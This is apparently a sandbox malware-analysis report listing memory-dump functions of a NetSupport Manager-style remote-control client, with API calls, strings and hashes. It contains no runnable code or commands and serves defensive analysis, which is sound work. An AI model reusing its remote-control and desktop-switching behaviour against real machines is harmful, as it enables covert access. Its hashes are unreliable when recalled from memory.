                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                          • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                          • API String ID: 711243594-1270230032
                                                                                          • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                          • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                          • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                          • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                          APIs
                                                                                          • ioctlsocket.WSOCK32 ref: 6C5D7642
                                                                                          • connect.WSOCK32(00000000,?,?), ref: 6C5D7659
                                                                                          • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C5D7660
                                                                                          • _memmove.LIBCMT ref: 6C5D76D3
                                                                                          • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D76F3
                                                                                          • GetTickCount.KERNEL32 ref: 6C5D7717
                                                                                          • ioctlsocket.WSOCK32 ref: 6C5D775C
                                                                                          • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5D7762
                                                                                          • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D777A
                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C5D778B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                          • String ID: *BlockingIO$ConnectTimeout$General
                                                                                          • API String ID: 4218156244-2969206566
                                                                                          • Opcode ID: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
                                                                                          • Instruction ID: c61fb15bd987e2e7e68fd7515e20124b0a7e663a183b22da689ba305607cbf09
                                                                                          • Opcode Fuzzy Hash: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
                                                                                          • Instruction Fuzzy Hash: A4414D71900314DBE720DB68CC48BDE73BAEF84305F41449AE51993A41EB70AE49CFA9
                                                                                          APIs
                                                                                            • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                            • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                            • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                            • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                            • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                            • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                          • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                          • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                          • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                          • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                          • GetDC.USER32(00000000), ref: 11133F03
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                          • CreateWindowExA.USER32(00000001,NSMWClass,013FE048,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                          • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                          • API String ID: 1594747848-1114959992
                                                                                          • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                          • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                          • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                          • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,F3EE1E80,?,00000000,00000000), ref: 1102CE44
                                                                                          • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                          • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                          • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                          • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                          • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                          • API String ID: 83693535-2077998243
                                                                                          • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                          • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                          • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                          • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 11132C60
                                                                                          • GetTickCount.KERNEL32 ref: 11132C91
                                                                                          • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                          • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTick$FolderPathwsprintf
                                                                                          • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                          • API String ID: 1170620360-4157686185
                                                                                          • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                          • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                          • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                          • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                          APIs
                                                                                          • GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                          • _memset.LIBCMT ref: 1114512D
                                                                                            • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75A78400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                          • _strncpy.LIBCMT ref: 111451FA
                                                                                            • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                          • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                          • API String ID: 3299820421-2117887902
                                                                                          • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                          • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                          • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                          • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                          APIs
                                                                                          • _strtok.LIBCMT ref: 11026C26
                                                                                          • _strtok.LIBCMT ref: 11026C60
                                                                                          • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _strtok$Sleep
                                                                                          • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                          • API String ID: 2009458258-3774545468
                                                                                          • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                          • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                          • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                          • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C5E67B5), ref: 6C5D8D6B
                                                                                            • Part of subcall function 6C5D4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6C5D8DCB
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C5D8DD8
                                                                                          • FreeLibrary.KERNEL32(?), ref: 6C5D8EBF
                                                                                            • Part of subcall function 6C5D4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
                                                                                            • Part of subcall function 6C5D4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE
                                                                                            • Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
                                                                                            • Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
                                                                                            • Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                          • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                          • API String ID: 2714439535-3484705551
                                                                                          • Opcode ID: 4cf3bd0c25f9ad74d08b03a31845362a29c878ce4c4754483fc4e2a54ef80a82
                                                                                          • Instruction ID: c644692432763445050495b9ad518f0df96245a93c3a5760e687270a25a5ba2d
                                                                                          • Opcode Fuzzy Hash: 4cf3bd0c25f9ad74d08b03a31845362a29c878ce4c4754483fc4e2a54ef80a82
                                                                                          • Instruction Fuzzy Hash: 0B41D871A00319AFDB10DB5E9C85BEA7378EB45706F0104A6EA15D6E40E770AE44CFA9
                                                                                          APIs
                                                                                            • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                          • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                          • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                          • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                          • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                          • GetLastError.KERNEL32 ref: 11102CB1
                                                                                          • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                          • GetLastError.KERNEL32 ref: 11102CCF
                                                                                          Strings
                                                                                          • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                          • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                          • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                          • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                          • API String ID: 2036220054-60805735
                                                                                          • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                          • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                          • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                          • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                          APIs
                                                                                          • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                          • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                          • wsprintfA.USER32 ref: 1115E3C8
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                            • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                          • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                          • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
